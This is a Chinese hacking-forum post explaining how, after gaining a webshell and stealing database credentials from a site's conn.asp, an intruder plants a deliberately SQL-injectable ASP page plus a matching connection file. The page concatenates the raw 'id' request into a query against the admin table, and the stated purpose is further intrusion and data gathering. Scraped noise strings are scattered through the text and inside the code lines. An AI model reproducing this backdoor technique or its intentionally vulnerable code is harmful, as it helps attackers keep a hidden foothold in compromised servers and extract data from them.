自己构造注入点方便入侵

admin

自己构造注入点方便入侵
# z9 y. _) o  N0 x3 g$ O4 L4 \
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点，然后方便渗透，找到更多的可利用的信息

1 [" c3 O& M7 c/ h这两天一直考试，想了下，就先仍出来，有什么问题可以提出来，我们一起讨论！
# s0 X' D' g- ~" k  H( T
* \6 r' W7 h! P. A5 ~; ~首先你要拿了一个webshell，这样你找到连接数据库的文件，大多都是conn.asp这个文件里面有mssql的用户和

密码，你要找到用户名、密码、数据库所在的IP，然后连接上去，至于连接大家应该都会，找到网站管理员的表
" I- ^+ Q. y5 I8 q6 x' z4 v, N
因为我测试的时候是用管理员的表，我朋友说任何表名都可以，只要这个表存在，代码如下：
! b% f% u6 v  Y' d( Q1 E& W
  ~+ R# x. x0 Q# o5 Z6 `& a  s程序代码
5 z3 w) d/ N9 F5 {<!--#include file="xx.asp"-->
<%
6 L& |: x4 o" C3 t. X- Qset rs=server.createobject("ADODB.recordset")
id = request("id")
# E- k0 ^2 R: PstrSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>

把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名，注意必须存在

你可以连接上去看下表名就是了！这里假设的是admin是表名！这个文件名随便保存！

* A0 c# B4 v& e  i$ f$ s  J5 f然后就要构造一个连接数据库的文件了，代码如下：
# b# [4 E. p+ E1 H: l, ^程序代码
  w0 ^" N$ c! m<%        
strSQLServerName = "000.000.000.000"     '服务器名称或地址
# o$ e6 R4 x; D  J8 ~$ z7 y) OstrSQLDBUserName = "sqlname"         '数据库帐号
strSQLDBPassword = "sqlpass"         '数据库密码
! _  [1 f" T4 n# G) b+ D7 F; jstrSQLDBName = "sqldataname"           '数据库名称
3 g" m( r0 F5 A4 e5 nSet conn = Server.CreateObject("ADODB.Connection")
/ c7 S* j8 n* W3 r+ T0 N5 VstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
%>

9 y" ^* ?, H" @4 R( k" R) t) n这里应该都会了，就不罗嗦了，不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话，

- Y# c  s# F5 N就这样，正常情况下，就OK了，伪造成功……

2 b, z. i  I& |8 o5 y9 a           如果有什么问题可以提出来大家一起探讨解决。